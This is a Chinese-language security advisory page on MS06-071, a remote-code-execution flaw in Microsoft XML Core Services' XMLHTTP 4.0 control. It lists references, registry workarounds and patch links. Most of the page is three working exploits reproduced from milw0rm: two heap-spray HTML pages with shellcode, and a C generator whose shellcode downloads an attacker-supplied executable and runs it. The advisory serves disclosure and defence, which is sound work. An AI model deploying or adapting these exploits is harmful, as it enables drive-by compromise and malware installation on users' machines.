首页 -> 安全研究
安全研究
安全漏洞
Microsoft XML核心服务XMLHTTP控件内存破坏漏洞(MS06-071)
发布日期:2006-11-03
更新日期:2006-11-15
受影响系统:
Microsoft XML Core Services 6.0描述:
Microsoft XML Core Services 4.0
BUGTRAQ ID: 20915
CVE(CAN) ID: CVE-2006-5745
Microsoft XML核心服务(MSXML)允许使用JScript、VBScript和Microsoft Visual Studio 6.0的用户构建可与其他符合XML 1.0标准的应用程序相互操作的XML应用。
在Microsoft XML Core Services的XMLHTTP 4.0 ActiveX控件中,setRequestHeader()函数没有正确地处理HTTP请求,允许攻击者诱骗用户访问恶意的站点导致执行任意指令。攻击者可以通过构建特制网页来利用此漏洞,如果用户访问该网页或单击电子邮件中的链接,该漏洞就可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。不过,要利用此漏洞,需要进行用户交互。
<*来源:Microsoft
链接:http://secunia.com/advisories/22687/
http://www.microsoft.com/technet/security/advisory/927892.mspx?pf=true
http://marc.theaimsgroup.com/?l=full-disclosure&m=116268675301419&w=2
http://www.microsoft.com/technet/security/bulletin/ms06-071.mspx
http://www.us-cert.gov/cas/techalerts/TA06-318A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution
Exploit
Author: n/a
Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239
Found in the wild and was pointed out on securiteam's blog (cheers Gadi
Evron!)
Changed up the shellcode so it wouldn't be as evil for the viewers,
calc.exe is called.
/str0ke
-->
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}"
>
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;
try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};
sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"
+
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
"%uFF57%u63E7%u6C61%u0063");
sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;
obj.open(new Object(),new Object(),new Object(),new Object(), new
Object());
obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>
</body></html>
========================================================
/*
*-----------------------------------------------------------------------
*
* MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
* Works on Windows XP versions including SP2 and 2K
*
* Author: M03
*
* Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code),
* Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze
* :
* Tested :
* : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer
* :
* :
* :
* :
* :Usage: filename <exe_URL> [htmlfile]
* : filename.exe http://site.com/file.exe localhtml.htm
*
*------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
FILE *fp = NULL;
char *file = "MicroHack.htm";
char *url = NULL;
unsigned char sc[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
char * header =
"<html xmlns=\"http://www.w3.org/1999/xhtml\">\n"
"<body>\n"
"<object id=target classid=\"CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}\" >\n"
"</object>\n"
"<script>\n"
"var obj = null;\n"
"function exploit() {\n"
"obj = document.getElementById('target').object;\n"
"try {\n"
"obj.open(new Array(),new Array(),new Array(),new Array(),new Array());\n"
"} catch(e) {};\n"
"sh = unescape (\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\" +\n"
" ";
char * footer =
"\n"
"sz = sh.length * 2;\n"
"npsz = 0x400000-(sz+0x38);\n"
"nps = unescape (\"%u0D0D%u0D0D\");\n"
"while (nps.length*2<npsz) nps+=nps;\n"
"ihbc = (0x12000000-0x400000)/0x400000;\n"
"mm = new Array();\n"
"for (i=0;i<ihbc;i++) mm[i] = nps+sh;\n"
"\n"
"obj.open(new Object(),new Object(),new Object(),new Object(), new Object());\n"
"\n"
"obj.setRequestHeader(new Object(),'......');\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"}\n"
"</script>\n"
"<body onLoad='exploit()' value='Exploit'>\n"
"\n"
"</body></html>\n"
"\n";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf("\"\n\"");
fprintf(fp, "%s", "\" +\n\"");
}
else
{
printf("\"");
fprintf(fp, "%s", "\"");
}
}
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
printf("\";\n");
fprintf(fp, "%s", "\");\n");
fflush(fp);
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
int sc_len = 0;
if (argc < 2)
{
printf("MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit (0day)\n");
printf("Code modded from LukeHack\n");
printf("\r\nUsage: %s <URL> [Local htmlfile]\r\n\n", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
return;
}
printf("[+] download url:%s\n", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%s\n", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!\n");
return;
}
fprintf(fp, "%s", header);
fflush(fp);
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url)+1;
PrintPayLoad(buf, sc_len);
fprintf(fp, "%s", footer);
fflush(fp);
printf("[+] exploit write to %s success!\n", file);
}
// Reverse Microsoft IE 9/11 Exploit
// milw0rm.com [2006-11-10]
=================================================================
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<script>
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
</script>
<script>
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script>
<object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" >
</object>
<script>
var obj = null;
obj = document.getElementById('target').object;
try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};
obj.open(new Object(),new Object(),new Object(),new Object(), new Object());
obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
</script>
</body></html>
# milw0rm.com [2006-11-10]
建议:
临时解决方法:
* 禁止在Internet Explorer中运行XMLHTTP 4.0 ActiveX控件。将以下内容粘贴到文本编辑器,然后使用.reg文件名扩展保存:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{88d969c5-f192-11d4-a65f-0040963251e5}]
"Compatibility Flags"=dword:00000400
双击这个.reg文件应用到系统。
* 配置Internet Explorer在运行活动脚本之前要求提示,或在Internet和本地intranet区中禁用活动脚本。
* 将Internet和本地intranet安全区设置为“高”。
* 拒绝对注册表中Microsoft XML Core Services 4.0 ({88D969C5-F192-11D4-A65F-0040963251E5})和Microsoft XML Core Services 6.0 ({88D96A0A-F192-11D4-A65F-0040963251E5})的受影响的CLSID进行访问。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-071)以及相应补丁:
MS06-071:Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (928088)
链接:http://www.microsoft.com/technet/security/bulletin/ms06-071.mspx
补丁下载:
http://www.microsoft.com/downloads/details.aspx?FamilyId=24B7D141-6CDF-4FC4-A91B-6F18FE6921D4
http://www.microsoft.com/downloads/details.aspx?FamilyId=9AE7F4E9-8228-4098-AF71-49C35684C17E
浏览次数:6724
严重程度:0(网友投票)
绿盟科技给您安全的保障